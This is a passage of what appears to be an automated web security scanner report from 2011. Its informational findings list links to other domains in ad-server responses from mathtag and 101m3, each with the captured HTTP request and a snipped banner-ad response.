</div><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161?"></SCRIPT>
...[SNIP]...
43514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=http://ad.doubleclick.net/jump/N553.mediamath/B5123370.43;sz=728x90;ord=60843514997508161?" target="_blank"><IMG SRC="http://ad.doubleclick.net/ad/N553.mediamath/B5123370.43;sz=728x90;ord=60843514997508161?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...
20.19. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301121447&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F%2BNSFTW%2B%3Fordering%3D%26searchphrase%3Dall&dt=1301103497608&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301103497644&frm=0&adk=3965760877&ga_vid=1118154544.1301103498&ga_sid=1301103498&ga_hid=2034243247&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1426&bih=995&fu=0&ifi=1&dtd=1908&xpc=YNKBJ0Atab&p=http%3A//www.soundingsonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=5:1300987769|1:1300977498|10001:1297818481|10004:1299934992|11:1299460723|2:1299285586|3:1299090747|4:1299460679|9:1300624484; ts=1301103428; uuid=4d5b2371-3928-7a83-24fb-d52328f5624b

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:37:33 GMT
Last-Modified: Sat, 26 Mar 2011 01:37:33 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x1, ewr-bidder-x2
Server: MMBD/3.5.0
Content-Length: 1238
Content-Type: text/html
Connection: keep-alive

<div width='1' height='1' style='display:none; overflow:hidden'><img style='left:-10px;top:-10px; position:absolute' src='http://pixel.mathtag.com/creative/img?mt_adid=70&mt_aid=54393751066380379&mt_e
...[SNIP]...
</div><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379?">
</SCRIPT>
...[SNIP]...
93751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=http://ad.doubleclick.net/jump/N553.mediamath/B5123370.3;sz=728x90;ord=54393751066380379?" target="_blank">
<IMG SRC="http://ad.doubleclick.net/ad/N553.mediamath/B5123370.3;sz=728x90;ord=54393751066380379?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...
20.20. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=7&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg703766.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:41:13 GMT; path=/
Content-Length: 1230
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
s=2__bannerid=273__zoneid=7__cb=b822ac64b1__r_id=c11472fa4b2f68aabf3c22fb6c423025__r_ts=lin60p__oadest=http%3A%2F%2Fvpe.sunbeltsoftware.com%2Fspeed_matters%2F%3Fadv%3D2009%26loc%3D809' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/ecd/ecd09c2f47eee28b09f983ffde1bcfe1.jpg' width='300' height='250' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.21. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=5&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg703766.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:40:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=c310c3ee264db63ff82e9bd59b8e11cc; expires=Sun, 25-Mar-2012 01:40:27 GMT; path=/
Content-Length: 3014
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
3.com/ck.php?oaparams=2__bannerid=221__zoneid=5__cb=9da3700339__r_id=82e0138847c958c1976d510f04bed3b3__r_ts=lin5zf__oadest=http%3A%2F%2Fwww.apc.com%2Fpromo%2Fget.cfm%3Fkeycode%3Dz250w' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/eb9/eb9c77f0acd593a8e0b6c48491cda1d0.gif' width='728' height='90' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.22. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=6&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg703766.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:41:13 GMT; path=/
Content-Length: 1241
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
oneid=6__cb=792923148f__r_id=33336e0e8d2e3d1f7c4dbf9ae24bd4d4__r_ts=lin60p__oadest=http%3A%2F%2Fredmondmag.com%2Fwhitepapers%2F2010%2F08%2Fredmond-2010-salary-survey.aspx%3Ftc%3Dpage0' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/289/289603b8e281a4ece8e2c51440e145b5.jpg' width='300' height='250' alt='Click Here!' title='Click Here!' border='0' /></a>
...[SNIP]...
20.23. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=6&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg537292.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:41:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:41:29 GMT; path=/
Content-Length: 3016
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
3.com/ck.php?oaparams=2__bannerid=222__zoneid=6__cb=bc4b3e86d7__r_id=148cb0aad3b86885fc799287464d9988__r_ts=lin615__oadest=http%3A%2F%2Fwww.apc.com%2Fpromo%2Fget.cfm%3Fkeycode%3Dz251w' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/183/183277dce817df6eeb65f11aada028f3.gif' width='300' height='250' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.24. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=7&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg537292.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:41:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:41:29 GMT; path=/
Content-Length: 1240
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
rid=285__zoneid=7__cb=84548f3de2__r_id=6e5d7328470e0dfc74f78b62f358022c__r_ts=lin615__oadest=http%3A%2F%2Fwww.scriptlogic.com%2Flanding%2Fgoogle%2Fpa%2Findex.asp%3Fsrc%3Dtechnetmag-pa' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/9f8/9f8120e2131c6704bbcbaba5381920c9.gif' width='300' height='250' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.25. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=5&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg703766.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:41:13 GMT; path=/
Content-Length: 1239
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
rid=289__zoneid=5__cb=7436ad8b54__r_id=b2e58622eee4500b823bcd20a82aaafc__r_ts=lin60p__oadest=http%3A%2F%2Fwww.scriptlogic.com%2Flanding%2Fgoogle%2Fpa%2Findex.asp%3Fsrc%3Dtechnetmag-pa' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/f9b/f9b67b5587e5f26e00786c7a7b1f854f.gif' width='728' height='90' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.26. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=6&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg537292.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:41:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:41:18 GMT; path=/
Content-Length: 1209
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
m3.com/ck.php?oaparams=2__bannerid=261__zoneid=6__cb=c406295f32__r_id=b31206970d282820dbdbbe0f4f11b6e3__r_ts=lin60u__oadest=http%3A%2F%2Fquitpaper.esker.com%2FCloudFaxDemoRequest.html' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/2dd/2dd14914618a1c77550a39321cd36fbe.jpg' width='300' height='250' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.27. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /afr.php?zoneid=7&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg703766.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:40:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:40:27 GMT; path=/
Content-Length: 1873
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<body>
<iframe src="http://view.atdmt.com/MRT/iview/284744122/direct/01?click=http://d.101m3.com/ck.php?oaparams=2__bannerid=198__zoneid=7__cb=cadb13e387__r_id=7b871e80cdf3322613b5c5440ab81d47__r_ts=lin5zf__oadest=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
ck.php?oaparams=2__bannerid=198__zoneid=7__cb=cadb13e387__r_id=7b871e80cdf3322613b5c5440ab81d47__r_ts=lin5zf__oadest=http%3A%2F%2Fclk.redcated%2FMRT%2Fgo%2F284744122%2Fdirect%2F01%2F" target="_blank"><img border="0" src="http://view.atdmt.com/MRT/view/284744122/direct/01/" /></a>
...[SNIP]...
20.28. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=5&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/ff426023.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:41:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:41:42 GMT; path=/
Content-Length: 1239
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
rid=287__zoneid=5__cb=2ac71389dc__r_id=ec75d6319e951a0563d05e2ec91a903b__r_ts=lin61i__oadest=http%3A%2F%2Fwww.scriptlogic.com%2Flanding%2Fgoogle%2Fpa%2Findex.asp%3Fsrc%3Dtechnetmag-pa' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/76f/76f08fc75d3b3370bdea7a66d7a977f6.gif' width='728' height='90' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.29. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=6&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg703766.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:40:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=45dda1b8d646629f01448fdd9972e45a; expires=Sun, 25-Mar-2012 01:40:27 GMT; path=/
Content-Length: 1202
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
//d.101m3.com/ck.php?oaparams=2__bannerid=253__zoneid=6__cb=be2efec85d__r_id=5715e1af4c029d835346dd5e5a23d642__r_ts=lin5zf__oadest=http%3A%2F%2Fwww.measureup.com%2FSharePoint2010.aspx' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/8dd/8ddf98aec1f5c1af44c2c4975afa529d.gif' width='300' height='250' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.30. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=7&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/ff426023.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:41:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:41:42 GMT; path=/
Content-Length: 1240
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
rid=284__zoneid=7__cb=93431126c2__r_id=73dae2f357a62be1a70332b315c76381__r_ts=lin61i__oadest=http%3A%2F%2Fwww.scriptlogic.com%2Flanding%2Fgoogle%2Fpa%2Findex.asp%3Fsrc%3Dtechnetmag-pa' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/9a1/9a13b7b2cd5ce8a48186bdc16d06712f.gif' width='300' height='250' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.31. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

